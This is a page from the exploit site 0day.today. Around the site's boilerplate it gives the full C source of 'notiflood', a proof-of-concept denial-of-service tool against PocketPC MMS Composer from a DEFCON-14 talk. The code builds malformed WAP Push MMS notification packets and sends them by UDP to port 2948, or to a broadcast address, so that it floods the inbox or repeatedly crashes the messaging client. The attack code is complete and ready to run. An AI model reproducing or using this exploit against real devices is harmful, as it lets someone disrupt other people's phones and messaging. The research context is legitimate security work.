0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

PocketPC MMS Composer (WAPPush) Denial of Service Exploit

Author

Collin Mulliner

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

=========================================================
PocketPC MMS Composer (WAPPush) Denial of Service Exploit
=========================================================



/*
 *  This is a Proof-of-Concept tool to demonstrate the PocketPC MMS Composer
 *  flood/crash vulnerability (ab)using the WAPPush port UDP:2948
 *
 *  This is for educational purposes only! Please use responsible!
 *
 *  (c) Collin Mulliner <collin@trifinite.org>
 *  http://www.trifinite.org 
 *  http://www.mulliner.org/pocketpc/
 *
 * NotfiFlood - a Proof-of-Concept PocketPC MMS Composer flooder
 *
 *(c) Collin Mulliner <collin@trifinite.org>
 *
 * http://www.mulliner.org/pocketpc/
 * http://www.trifinite.org/
 *
 **** For educational purposes only! Please use responsible! ***
 *
 * NotiFlood is a PoC MMS M-notification.ind flooder written to demo the PocketPC
 * MMS Composer vulnerabilities for my DEFCON-14 talk "Advanced Attacks Against 
 * PocketPC Phones".
 *
 * The tool sends MMS new message notifications to the target PocketPC device over
 * WiFi IP:UDP4:2948. In flood mode the device plays the new message sound for 
 * every received notification. If auto receive is enabled the phone will try to
 * dial-up GPRS in order to receive the message. After receiving a couple 
 * hundred messages the phone randomly freezes or rejects new messages. Further
 * the MMS inbox is filled up with messages that only can be deleted manually
 * one-by-one. In crash mode, each notification crashes the MMS client and
 * therefore actively keeps the user from using the Inbox application while
 * connected to WiFi (the Inbox application also handles email like via POP3 and
 * IMAP).
 *
 * This was tested with WinCE 4.2x and MMS Composer 1.5 and 2.0
 *
 * Examples:
 *  flood all clients in 192.168.1/24:
 *  notiflood -d 192.168.1.255 -n 0
 *
 *  crash client at: 192.168.42.29:
 *  notiflood -d 192.168.42.29 -i 500000 -n 1 -c
 * 
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
//#include <libnet.h>
#include <sys/poll.h>
#include <sys/ioctl.h>
#include <linux/if_tun.h> 
#include <arpa/inet.h>
#include <getopt.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <net/ethernet.h>
#include <time.h>
#include <sys/un.h>

int mms1_pos[] = {40, 106, 167, 228, 289};

unsigned char mms1[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x97,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x96,0x1f,0x3a,0x83,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x00,0x8e,0x66,0x68,0x32,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0x2d,0xd0,0x00};

unsigned char mms2[] = {0x00,0x06,0x22,0x61,0x70,0x70,0x6c,0x69,0x63,0x61,0x74,0x69,0x6f,0x6e,0x2f,0x76,0x6e,0x64,0x2e,0x77,0x61,0x70,0x2e,0x6d,0x6d,0x73,0x2d,0x6d,0x65,0x73,0x73,0x61,0x67,0x65,0x00,0xaf,0x84,0x8c,0x82,0x98,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x8d,0x90,0x89,0x1f,0x3d,0x80,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x97,0x1f,0x3a,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x96,0x1f,0x35,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x83,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00};

int mms2_pos[] = { 40, 314, 375, 436, 489 };

char to[100] = {"receiver@receiver.com"};
char from[100] = {"sender@sender.net"};
char subject[100] = {"Your P0ckEtPC just P00PED itself!"};

unsigned int iteration = 0;

void iterate(unsigned char *nty, int *pos)
{
	char tmp[57];
	char tmp2[57];
	
	sprintf(tmp, "%u%u", time(NULL), iteration);
	memset(&nty[pos[0]], '0', 57);
	memcpy(&nty[pos[0]], tmp, (strlen(tmp) < 57) ? strlen(tmp) : 56);
	
	sprintf(tmp2, "http://127.0.0.1/?%s",tmp);
	memset(&nty[pos[4]], '0', 57);
	memcpy(&nty[pos[4]], tmp2, (strlen(tmp2) < 57) ? strlen(tmp2) : 56);
}


void init(unsigned char *nty, int *pos)
{
	memset(&nty[pos[1]], ' ', 56);
	memcpy(&nty[pos[1]], from, (strlen(from) < 57) ? strlen(from) : 56);
	memset(&nty[pos[2]], ' ', 56);
	memcpy(&nty[pos[2]], to, (strlen(to) < 57) ? strlen(to) : 56);
	memset(&nty[pos[3]], ' ', 56);
	memcpy(&nty[pos[3]], subject, (strlen(subject) < 57) ? strlen(subject) : 56);
}

void usage()
{
	printf(""\
	"notiflood - proof-of-concept PocketPC MMS Composer m-notification.ind flooder\n\n"\
	" (c) 2006 Collin Mulliner <collin@trifinite.org>\n"\
	" http://www.mulliner.org/pocketpc/ | http://www.trifinite.org\n\n"\
	" for educational purposes only, please use responsible!\n\n"\
	"options:\n"\
	"\t-d destination ip (broadcast works!)\n"\
	"\t-i interval (useconds)\n"\
	"\t-n number of packets (0=unlimited)\n"\
	"\t-s subject\n"\
	"\t-f from\n"\
	"\t-t to\n"\
	"\t-c crash client\n"\
	"\t-F flip-flop between crash / start client\n"\
	"\t-h help\n"\
	"\t-q quiet\n\n");
	
}

int main(int argc, char **argv)
{
	int f, i, l = 0;
	char system_cmd[200];
	int mode = 0; // 0 = flood , 1 = crash , 2 = flip-flop
	int opt;
	char dest[20] = {0};
	int interval = 500000;
	unsigned int num = 0;
	int verbose = 1;
	int flipflop = 0;

	
	while ((opt = getopt(argc, argv, "i:n:d:s:t:f:cqhF")) != EOF) {
		switch (opt) {
		case 'd':
			strncpy(dest, optarg, 19);
			break;
		case 's':
			strncpy(subject, optarg, 56);
			break;
		case 't':
			strncpy(to, optarg, 56);
			break;
		case 'f':
			strncpy(from, optarg, 56);
			break;
		case 'c':
			mode = 1;
			break;
		case 'F':
			mode = 2;
			break;
		case 'n':
			num = atoi(optarg);
			break;
		case 'i':
			interval = atoi(optarg);
			break;
		case 'q':
			verbose = 0;
			break;
		default:
		case 'h':
			usage();
			break;
		}
	}

	if (optind < argc) {
		usage();
		exit(-1);
	}
	if (strlen(dest) == 0) {
		usage();
		exit(-1);
	}

	sprintf(system_cmd, "cat mmsflood.fld|socat udp4:%s:2948,broadcast stdin &", dest);

	init(mms1, mms1_pos);
	init(mms2, mms2_pos);

	if (verbose) {
		printf("to:      %s\n", to);
		printf("from:    %s\n", from);
		printf("subject: %s\n", subject);
		printf("dst-ip: %s\n", dest);
		if (mode == 1) printf("crash client\n");
		else if (mode == 0) printf("fillup client inbox\n");
		else printf("flip-flop mode\n");
		printf("flood interval: %d seconds\n", interval);
		printf("number of packets: %d (0=unlimited)\n", num);
	}

	if (mode == 2) {
		flipflop = 1;
	}

	do {
		iteration++;
		f = open("mmsflood.fld", O_CREAT|O_RDWR|O_TRUNC, 00666);
		if (mode == 0) { // flood
			iterate(mms1, mms1_pos);
			write(f, mms1, sizeof(mms1));
		}
		else if (mode == 1) { // crash
			iterate(mms2, mms2_pos);
			write(f, mms2, sizeof(mms2));
		}
		close(f);
		system(system_cmd);
		if (flipflop == 1) {
			if (mode == 0) mode = 1;
			else mode = 0;
		}
		if (interval > 0) usleep(interval);
	} while ((iteration < num && num != 0) || num == 0);
	
	return(0);
}



#  0day.today [2024-11-16]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

PocketPC MMS Composer (WAPPush) Denial of Service Exploit

Report Error

Report Error